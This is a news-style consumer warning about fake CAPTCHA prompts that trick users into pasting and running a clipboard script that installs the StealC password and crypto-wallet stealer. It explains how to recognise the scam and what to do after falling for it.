A warning from the Identity Theft Resource Center is drawing attention to a scam that takes one of the internet's most ordinary security tools and turns it into a trap. The scam uses fake CAPTCHA prompts to trick users into installing malware on their own computers, without ever clicking a download button or opening a suspicious file.
According to a report by Fox News, the attack works by presenting users with what looks like a normal CAPTCHA verification screen. Instead of asking them to click images of traffic lights or fire hydrants, the fake prompt instructs them to press Windows + R on their keyboard, then press Ctrl + V, and then hit Enter. Those three steps open a hidden Run window, paste a malicious script that has already been loaded onto the clipboard, and execute it, all without the user realizing what has happened.
Security researchers say this scam typically delivers a piece of malware called StealC. It runs silently in the background and searches for valuable data on the infected machine. That includes saved passwords, browser login sessions, autofill data, and cryptocurrency wallet details. Because it operates without visible symptoms, many users have no idea their machine is compromised until they notice unauthorized access to their accounts.
The scam is effective for a specific reason. People have seen CAPTCHA prompts on banking sites, retail pages, and login screens for years. That familiarity creates trust, and trust lowers the kind of caution that would normally cause someone to stop and question unusual instructions. There is no suspicious download window. There is no pop-up warning. The page simply gives the user a set of steps, and the user follows them.
The Identity Theft Resource Center and cybersecurity researchers are clear on what a real CAPTCHA will and will not do. A legitimate verification check will never ask a user to open a command window, use keyboard shortcuts like Windows + R, or instruct them to paste and run any kind of command. If a CAPTCHA prompt asks for any of those things, the correct response is to close the browser tab immediately.
The scam is part of a broader pattern of attacks that target human behavior rather than software vulnerabilities. A user can avoid suspicious links, ignore phishing emails, and still be compromised in a single moment because a familiar-looking prompt asked them to do something that felt routine. That behavioral targeting is what makes this category of attack particularly difficult to defend against with technical tools alone.
The warning comes as cybersecurity threats continue to grow in sophistication. Older scams relied on users clicking bad links or opening infected attachments. This approach requires none of that. The user never downloads anything. The user never visits an obviously suspicious site. The user simply follows instructions on a page that looks like hundreds of other pages they have trusted before.
Anyone who believes they may have already followed these steps on a suspicious site is advised to run a full malware scan immediately, change passwords for important accounts, and check for unauthorized activity across banking and email services.
